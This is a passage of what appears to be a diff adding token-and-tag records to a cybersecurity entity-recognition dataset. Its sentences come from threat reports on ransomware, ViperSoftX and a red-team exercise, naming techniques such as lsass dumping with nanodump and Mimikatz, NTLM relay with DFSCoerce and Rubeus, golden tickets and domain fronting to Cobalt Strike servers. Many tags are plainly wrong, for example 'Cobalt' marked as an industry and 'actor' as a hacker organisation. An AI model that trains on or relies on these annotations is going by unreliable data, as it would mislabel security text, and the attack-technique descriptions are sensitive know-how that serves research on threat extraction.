+ "the", + "ransomware", + "within", + "a", + "7zip", + "encrypted", + "archive" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "archive", + "containing", + "the", + "ransomware," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "decompression", + "utility", + "to", + "extract", + "the", + "ransomware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp" + ] + }, + { + "tokens": [ + "drop", + "the", + "defenses", + "of", + "the", + "victim,", + "inhibit", + "monitoring,", + "disable", + "networking" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stops", + "specific", + "defensive", + "services", + "(Windows", + "Defender,", + "etc)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "Will", + "also", + "skip", + "enumeration", + "and", + "stopping", + "of", + "antivirus", + "software.-" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "authenticate", + "to", + "the", + "site", + "behind", + "the", + "onion", + "link", + "on", + "the", + "TOR", + "network" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "ShellExecuteA", + "is", + "also", + "used", + "to", + "launch" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "API", + "call", + "attempts", + "to", + "processes:" + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "local", + "module", + "utilizes", + "the", + "LookupPrivilegeValueW", + "and", + "AdjustTokenPrivileges", + "that", + "Windows", + "API", + "calls", + "on", + "its", + "own", + "process", + "via", + "GetCurrentProcess", + "and", + "OpenProcessToken", + "to", + "obtain", + "SeDebugPrivilege", + "privileges." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "Active", + "Directory", + "group", + "policies", + "allows", + "the", + "malicious", + "actor", + "to", + "hit", + "all", + "systems", + "in", + "the", + "environment", + "for", + "as", + "long", + "as", + "that", + "group", + "policy", + "is", + "active", + "in", + "the", + "victim’s", + "environment." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Potential", + "Process", + "Hollowing" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "more", + "sophisticated", + "encryption" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "technique", + "for", + "encryption-decryption", + "is", + "easily", + "more", + "discernable", + "during", + "analysis", + "because", + "both", + "the", + "encrypted", + "data", + "and", + "the", + "mapping", + "are", + "in", + "the", + "same", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "for", + "its", + "execution", + "technique", + "of", + "hiding", + "malicious", + "code", + "inside", + "log", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "bytes", + "of", + "the", + "encrypted", + "section", + "is", + "a", + "specific", + "index", + "on", + "the", + "byte", + "map" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Though", + "this", + "is", + "a", + "very", + "rigid", + "method", + "of", + "hiding", + "its", + "codes," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + "byte", + "remapping", + "to", + "ensure", + "that", + "the", + "shellcode", + "cannot", + "be", + "easily", + "decrypted", + "without", + "the", + "correct", + "byte", + "map" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "usually", + "the", + "encrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shows", + "that", + "their", + "offsets", + "within", + "the", + "encrypted", + "region", + "remain", + "the", + "same", + "since", + "they", + "result", + "in", + "a", + "similar", + "shellcode", + "even", + "if", + "they", + "are", + "composed", + "of", + "different", + "bytes", + "per", + "binary." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "checks", + "if", + "there", + "are", + "monitoring", + "tools,", + "specifically", + "Process", + "Monitor,", + "running", + "in", + "the", + "current", + "machine", + "with", + "the", + "following", + "strings:", + "procmon", + "procmon64", + "procmon64a" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "checks", + "for", + "a", + "few", + "installed", + "and", + "active", + "antivirus", + "products,", + "namely:", + "Windows", + "Defender", + "ESET" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SecTeam", + "I-SecTeam", + "I-SecTeam" + ] + }, + { + "tokens": [ + "the", + "malware", + "proceeds", + "to", + "decrypt", + "the", + "PowerShell", + "code" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Furthermore,", + "since", + "the", + "data", + "to", + "be", + "decrypted", + "is", + "in", + "another", + "file,", + "the", + "routine", + "becomes", + "even", + "more", + "difficult", + "to", + "investigate,", + "as", + "analysts", + "would", + "need", + "the", + "correct", + "pair", + "for", + "decryption." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Afterward,", + "the", + "shellcode", + "will", + "then", + "decrypt", + "and", + "load", + "the", + "main", + "ViperSoftX", + "DLL", + "embedded", + "within", + "the", + "carrier." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Moreover,", + "all", + "the", + "strings,", + "binaries,", + "and", + "other", + "relevant", + "data", + "within", + "the", + "ViperSoftX", + "DLL", + "also", + "gets", + "decrypted", + "the", + "same", + "way." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "actual", + "bytes", + "of", + "the", + "decrypted", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "crawl", + "through", + "different", + "paths", + "in", + "the", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scans", + "for", + "these", + "cryptocurrency", + "wallets", + "in", + "local", + "directories:", + "Armory", + "Atomic", + "Wallet", + "Binance", + "Bitcoin", + "Blockstream", + "Green", + "Coinomi", + "Delta", + "Electrum", + "Exodus", + "Guarda", + "Jaxx", + "Liberty", + "Ledger", + "Live", + "Trezor", + "Bridge" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "B-Idus", + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "the", + "use", + "of", + "DLL", + "sideloading", + "for", + "its", + "arrival", + "and", + "execution", + "technique." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "found", + "in", + "the", + "sideloaded", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "sideloaded", + "DLL)," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "DLL", + "sideloading" + ], + "ner_tags": [ + "B-Way", + "O" + ] + }, + { + "tokens": [ + "While", + "other", + "cybercriminals", + "use", + "sideloading", + "to", + "load", + "another", + "non-binary", + "component" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "We", + "have", + "also", + "found", + "that", + "each", + "sideloader", + "DLL", + "has", + "its", + "own", + "pair", + "of", + "executable", + "and", + "byte", + "map," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "still", + "downloads", + "a", + "PowerShell", + "code" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "or", + "Windows", + "Scripting" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "File-packed", + "Magniber", + "ransomware" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "obtain", + "the", + "credentials,", + "the", + "team", + "took", + "a", + "snapshot", + "of", + "lsass.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "with", + "a", + "tool", + "called", + "nanodump,", + "exported", + "the", + "output,", + "and", + "processed", + "the", + "output", + "offline", + "with", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "team", + "obtained", + "the", + "cached", + "credentials", + "from", + "a", + "SharePoint", + "server", + "account", + "by", + "taking", + "a", + "snapshot", + "of", + "lsass.exe", + "with", + "a", + "tool", + "called", + "nanodump,", + "exporting", + "the", + "output", + "and", + "processing", + "the", + "output", + "offline", + "with", + "Mimikatz." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "They", + "then", + "used", + "forged", + "credentials", + "to", + "move", + "to", + "multiple", + "hosts", + "across", + "different", + "sites", + "in", + "the", + "environment", + "and", + "eventually", + "gained", + "root", + "access", + "to", + "all", + "workstations", + "connected", + "to", + "the", + "organization’s", + "mobile", + "device", + "management", + "(MDM)", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "this", + "root", + "access", + "to", + "move", + "laterally", + "to", + "SBS-connected", + "workstations." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "team", + "attempted", + "to", + "determine", + "valid", + "accounts", + "based", + "on", + "group", + "name", + "and", + "purpose" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "attempted", + "to", + "leverage", + "these", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "From", + "that", + "host,", + "the", + "team", + "moved", + "laterally", + "to", + "a", + "misconfigured", + "server,", + "from", + "which", + "they", + "compromised", + "the", + "domain", + "controller", + "(DC)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "with", + "a", + "button,", + "which,", + "when", + "clicked,", + "downloaded", + "a", + "“malicious”", + "ISO", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "the", + "download,", + "another", + "button", + "appeared,", + "which,", + "when", + "clicked,", + "executed", + "the", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Users", + "downloaded", + "and", + "executed", + "the", + "team’s", + "initial", + "access", + "payloads", + "after", + "clicking", + "buttons", + "to", + "trigger", + "download", + "and", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "used", + "compromised", + "workstation", + "and", + "domain", + "admin", + "accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "a", + "previously", + "compromised", + "workstation", + "admin", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "a", + "previously", + "compromised", + "domain", + "admin", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "team", + "leveraged", + "compromised", + "workstation", + "and", + "domain", + "admin", + "accounts", + "to", + "execute", + "a", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "team", + "compromised", + "a", + "domain", + "admin", + "account", + "and", + "used", + "it", + "to", + "laterally", + "to", + "multiple", + "workstations", + "and", + "the", + "DC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "used", + "compromised", + "workstation", + "and", + "domain", + "admin", + "accounts", + "to", + "upload", + "a", + "payload", + "via", + "SMB", + "on", + "several", + "target", + "Workstations", + "and", + "the", + "DC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Use", + "a", + "previously", + "compromised", + "workstation", + "admin", + "account", + "to", + "upload", + "and", + "execute", + "a", + "payload", + "via", + "SMB" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Use", + "a", + "previously", + "compromised", + "domain", + "admin", + "account", + "to", + "upload", + "and", + "execute", + "a", + "payload", + "via", + "SMB" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "team’s", + "C2", + "redirectors", + "used", + "HTTPS", + "reverse", + "proxies", + "to", + "redirect", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "HTTPS" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "HTTPS", + "beacon" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "post-exploit", + "tool", + "that", + "leverages", + "HTTP", + "protocols", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "HTTPS", + "reverse", + "proxies", + "to", + "redirect", + "C2", + "traffic" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Establish", + "a", + "session", + "that", + "originates", + "from", + "a", + "target", + "Workstation", + "system", + "directly", + "to", + "an", + "external", + "host", + "over", + "a", + "clear", + "text", + "protocol,", + "such", + "as", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Establish", + "a", + "session", + "that", + "originates", + "from", + "a", + "target", + "Domain", + "Controller", + "system", + "directly", + "to", + "an", + "external", + "host", + "over", + "a", + "clear", + "text", + "protocol,", + "such", + "as", + "HTTP." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "used", + "HTTPS", + "reverse", + "proxies", + "to", + "redirect", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "team", + "uploaded", + "and", + "executed", + "well-known", + "malicious", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "to", + "download", + "and", + "execute", + "a", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Upload", + "and", + "execute", + "a", + "well-known", + "(e.g.,", + "with", + "a", + "signature)", + "malicious", + "file", + "to", + "a", + "target", + "DC", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "redirectors", + "to", + "redirect", + "C2", + "traffic", + "between", + "the", + "target", + "organization’s", + "network", + "and", + "the", + "team’s", + "C2", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "HTTPS", + "reverse", + "proxies", + "to", + "redirect", + "C2", + "traffic", + "between", + "target", + "network", + "and", + "the", + "team’s", + "Cobalt", + "Strike", + "servers." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "these", + "platforms", + "to", + "create", + "flexible", + "and", + "dynamic", + "redirect", + "servers", + "to", + "send", + "traffic", + "to", + "the", + "team’s", + "Cobalt", + "Strike", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "redirectors", + "used", + "HTTPS", + "reverse", + "proxies", + "to", + "redirect", + "C2", + "traffic", + "between", + "the", + "target", + "organization’s", + "network", + "and", + "the", + "Cobalt", + "Strike", + "team", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "domain", + "fronting", + "to", + "disguise", + "outbound", + "traffic", + "in", + "order", + "to", + "diversify", + "the", + "domains", + "with", + "which", + "the", + "persistent", + "beacons", + "were", + "communicating." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-SamFile", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "domain", + "fronting", + "[T1090.004]", + "to", + "disguise", + "outbound", + "traffic", + "in", + "order", + "to", + "diversify", + "the", + "domains", + "with", + "which", + "the", + "persistent", + "beacons", + "were", + "communicating" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "technique,", + "which", + "also", + "leverages", + "CDNs,", + "allows", + "the", + "beacon", + "to", + "appear", + "to", + "connect", + "to", + "third-party", + "domains,", + "such", + "as", + "nytimes.com,", + "when", + "it", + "is", + "actually", + "connecting", + "to", + "the", + "team’s", + "redirect", + "server" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "technique", + "leverages", + "CDNs", + "associated", + "with", + "high-reputation", + "domains", + "so", + "that", + "the", + "malicious", + "traffic", + "appears", + "to", + "be", + "directed", + "towards", + "a", + "reputation", + "domain", + "but", + "is", + "actually", + "redirected", + "to", + "the", + "red", + "team-controlled", + "Cobalt", + "Strike", + "servers." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "which", + "prompted", + "DC", + "authentication", + "to", + "the", + "SharePoint", + "server", + "using", + "the", + "server’s", + "NTLM", + "hash.", + "The", + "team", + "then", + "deployed", + "Rubeus", + "to", + "capture", + "the", + "incoming", + "DC", + "TGT" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "performed", + "an", + "NTLM-relay", + "attack", + "to", + "obtain", + "the", + "DC’s", + "TGT,", + "followed", + "by", + "a", + "golden", + "ticket", + "attack", + "on", + "a", + "SharePoint", + "server", + "with", + "Unconstrained", + "Delegation", + "to", + "gain", + "the", + "ability", + "to", + "impersonate", + "any", + "Site", + "1", + "AD", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "ran", + "the", + "DFSCoerce", + "python", + "script,", + "which", + "prompted", + "DC", + "authentication", + "to", + "a", + "server", + "using", + "the", + "server’s", + "NTLM", + "hash.", + "The", + "team", + "then", + "deployed", + "Rubeus", + "to", + "capture", + "the", + "incoming", + "DC", + "TGT." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "ran", + "the", + "DFSCoerce", + "python", + "script,", + "which", + "prompted", + "DC", + "authentication", + "to", + "a", + "server", + "using", + "the", + "server’s", + "NTLM", + "hash" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "some", + "instances,", + "they", + "used", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "Event", + "Subscriptions" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "used", + "WMI", + "Event", + "Subscriptions", + "to", + "move", + "laterally", + "between", + "sites." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command-line", + "tool" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "stored", + "credentials", + "in", + "a", + "database", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "searched", + "files", + "on", + "the", + "server,", + "and", + "found", + "plaintext", + "credentials" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "plaintext", + "credentials", + "in", + "PowerShell", + "scripts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "team", + "found", + "a", + ".txt", + "file", + "containing", + "plaintext", + "credentials", + "for", + "the", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "found", + "plaintext", + "credentials", + "to", + "an", + "API", + "user", + "account", + "stored", + "in", + "PowerShell", + "scripts", + "on", + "an", + "MDM", + "server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Using", + "the", + "pattern", + "discovered", + "in", + "these", + "credentials,", + "the", + "team", + "was", + "able", + "to", + "crack", + "the", + "user’s", + "workstation", + "account", + "password" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "team", + "cracked", + "a", + "user’s", + "workstation", + "account", + "password", + "after", + "learning", + "the", + "user’s", + "patterns", + "from", + "plaintext", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Detect", + "and", + "Identify", + "source", + "IP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Detect", + "and", + "Identify", + "source", + "IP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Detect", + "and", + "identify", + "source", + "IP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Detect", + "and", + "identify", + "source", + "IP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Detect", + "and", + "identify", + "source", + "IP" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Service", + "Creation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Service", + "Creation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Service", + "Creation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "a", + "payload", + "via", + 